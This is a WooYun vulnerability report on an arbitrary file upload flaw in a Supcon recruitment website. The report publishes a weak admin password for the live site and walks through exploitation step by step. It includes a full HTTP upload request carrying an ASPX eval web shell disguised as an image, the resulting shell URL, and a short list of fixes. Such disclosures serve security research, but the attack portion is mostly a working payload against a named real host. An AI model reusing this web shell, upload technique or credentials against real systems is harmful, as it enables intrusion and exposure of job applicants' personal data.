当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144724

漏洞标题:浙江中控某招聘网存在任意文件上传可GetShell

相关厂商:浙江中控

漏洞作者: 路人甲

提交时间:2015-10-04 14:49

修复时间:2015-11-18 14:50

公开时间:2015-11-18 14:50

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

浙江中控招聘网
http://hr.supcon.com/
先提示下 这个后台管理系统存在弱口令,
http://hr.supcon.com/Admin/Home/LogOn 用户名:admin 密码:888888
会导致大量人员的简历信息泄露
下面是任意文件上传导致恶意代码执行步骤
第一步:注册个账号 演示账号888888 密码888888
第二步: 找个上传的文件的地方

1.png


第三步:做个带木马的图片,上传,提示成功

POST /UDocument/DocumentSave HTTP/1.1
Host: hr.supcon.com
Connection: keep-alive
Content-Length: 404
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://hr.supcon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymXePhdE0Z3qj57ze
Referer: http://hr.supcon.com/SocialJob/IndexPersonal
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=zfuq3l2cbaiu4n452qhv10vd; ASPSESSIONIDCCCDATQR=CHHDDFPDHPIDKIFODMPPGBMA
------WebKitFormBoundarymXePhdE0Z3qj57ze
Content-Disposition: form-data; name="Id"
default
------WebKitFormBoundarymXePhdE0Z3qj57ze
Content-Disposition: form-data; name="ExtraPic"; filename="test1.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["tom"],"unsafe"));%>
------WebKitFormBoundarymXePhdE0Z3qj57ze
Content-Disposition: form-data; name="DocuMemo"
111
------WebKitFormBoundarymXePhdE0Z3qj57ze--


第四步:更改文件后缀用工具上传,提示成功 ,返回报文竟然有明确的地址
http://hr.supcon.com/files/Supcon2015103_269053237.aspx
第五步:用木马地址连接提示成功,可执行

2.png


漏洞证明:

3.png


2.png

修复方案:

1.弱口令加强
2.白名单方式判断文件后缀
3.去掉文件目录的可执行权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝